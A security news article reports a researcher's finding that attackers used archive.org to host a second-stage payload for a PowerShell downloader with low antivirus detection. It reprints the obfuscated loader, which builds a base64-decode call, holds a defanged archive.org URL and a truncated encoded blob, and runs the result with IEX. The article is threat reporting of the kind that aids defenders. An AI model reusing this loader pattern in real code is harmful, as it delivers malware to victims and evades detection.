Security researcher uncovered a malicious thread that was being served in the archive.org(Way back Machine), and it has been detected by only a limited number of Antivirus solutions.
Archive.org also know as the “Way Back Machine” offers you to travel back to the old web pages of the websites since every website on the internet is keep updating to the newer versions.
Xavier Mertens (@xme), a Cyber Security Consultant from SANS, uncovered a new piece of Powershell script that was used by attackers as a downloader and deliver the next stage of payload with the help of Archive.org.
He was also found an interesting file is server-lol-123_20210606_meta.xml that reveals information about the attackers.
There is a directory ( server-lol-123_20210606) that contains several files that were being uploaded on June 6, 2021.
According to the researcher report “i found a piece of malicious Powershell that uses archive.org to download the next stage payload. It’s score on VT is only 5/58[3] (SHA256:2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:”
FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
{
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
}
$TYFGYTFFFYTFYTFYTFYT = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
$JUANADEARCO = 'JEZWWVRGWVRGWUZZRllGWUZHWT0 ... [removed] ... VFJEVAp9CklFWCB2aXA='
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);
$Run=($HBAR -Join '')|I`E`X
The above script contains a more Powershell code working like a downloader once it gets executed, then it downloads the next stage of payload from archive.org, dumps it on the disk, and execute it.
There is a piece of evidence that the Attackers are continuously uploading several files on Archive.org, and it’s a big surprise that archive.org is a top domain and is usually not blocked or tagged as malicious.
“That’s the wild Internet today: If you allow users to create an account and upload some data, the chances are big that the feature will be (ab)used to host malicious content.” the researcher said.
